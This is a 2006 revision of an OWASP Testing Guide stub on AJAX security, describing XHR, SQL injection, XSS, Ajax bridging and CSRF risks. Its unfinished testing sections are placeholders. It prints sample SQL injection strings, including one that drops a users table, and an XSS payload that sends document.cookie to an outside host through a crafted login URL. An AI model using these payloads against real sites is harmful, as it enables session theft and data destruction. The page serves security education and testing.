Difference between revisions of "Testing for AJAX Vulnerabilities (OWASP-AJ-001)"

From OWASP
Jump to: navigation, search
(Attacks and Vulnerabilities)
Line 1: Line 1:
 +
[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br>
 +
{{Template:OWASP Testing Guide v2}}
 +
 +
 +
 
== Introduction ==
 
== Introduction ==
 
<br>
 
<br>

Revision as of 03:17, 5 November 2006

[Up]
OWASP Testing Guide v2 Table of Contents


Introduction


Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.

Attacks and Vulnerabilities


XMLHttpRequest Vulnerabilities
AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


Increased Attack Surface
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content.

SQL Injection
SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database.
A typical SQL Injection attack could be as follows

  • Example 1
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;

This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges.

  • Example 2
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;

The above query helps in dropping all the tables and destructs the database.

Cross Site Scripting
Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service.

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.

The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.

  • Example
<script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script>

Usage:

http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script>

This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.

Ajax Bridging
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access.

Cross Site Request Forgery(XSRF)
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet.


MySpace Attack
Yahoo! Mail Attack

Black Box testing and example

Testing for Topic X vulnerabilities:
...
Result Expected:
...

Gray Box testing and example

Testing for Topic X vulnerabilities:
...
Result Expected:
...

References

Whitepapers
...
Tools
...


OWASP Testing Guide v2

Here is the OWASP Testing Guide v2 Table of Contents OWASP Testing Guide v2 Table of Contents

This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.